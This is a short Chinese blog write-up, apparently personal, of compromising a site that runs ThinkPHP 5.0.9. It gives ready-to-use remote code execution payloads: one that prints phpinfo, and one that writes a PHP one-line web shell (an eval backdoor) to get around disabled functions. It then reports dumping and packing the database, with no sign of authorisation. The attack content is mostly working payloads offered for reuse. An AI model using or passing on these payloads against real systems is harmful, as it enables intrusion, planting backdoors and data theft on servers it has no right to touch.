记一次tp5.0.9RCE

目标

 常规报错

 直接说版本tp5.0.9,然后尝试payload

_method=__construct&method=get&filter[]=call_user_func&get[]=phpinfo打出phpinfo

顺便看了哈disable_function

 基本执行命令的payload都被禁了

还好payload多,直接拿下

s=file_put_contents('dd.php','<?php @eval($_POST[1]);')&_method=__construct&method=POST&filter[]=assert

 

 然后脱裤,打包,渗透结束

渗透

相关

渗透测试(一)-Msf生成免杀后门(内网篇)

渗透测试(二)-Metasploit生成免杀后门(外网篇)

横向渗透

渗透测试之billu b0x2

DC3靶机渗透

DC3靶机渗透

域渗透之MS14-068域提权漏洞

[转载]IIS中间件渗透总结

IPv6渗透测试工具

渗透测试之劫持国外某云BucketName

内网渗透之巧用smb beacon拿下不出网主机

记一次靶场渗透记录

标签